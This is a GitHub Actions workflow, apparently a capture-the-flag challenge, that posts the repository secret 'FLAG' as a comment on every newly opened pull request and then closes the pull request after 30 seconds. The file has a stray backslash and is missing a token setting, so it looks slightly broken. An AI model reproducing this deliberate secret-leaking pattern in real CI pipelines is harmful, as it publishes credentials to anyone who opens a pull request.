name: Action

on:
  pull_request:
    types:
      - opened

jobs:
  print-secret-and-delete-pr:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v3

      - name: Print Secret to PR
        run: |
          echo "Secret Value: ${{ secrets.FLAG }}" > secret_output.txt
          echo "SECRET_OUTPUT=$(cat secret_output.txt)" >> $GITHUB_ENV

      - name: Comment on PR\
        uses: thollander/actions-comment-pull-request@v2
        with:
          message: |
            "${{ env.SECRET_OUTPUT }}"

      - name: Wait for 30 seconds
        run: sleep 30

      - name: Delete PR
        run: |
          gh pr close https://github.com/${{ github.repository }}/pull/${{ github.event.number }}
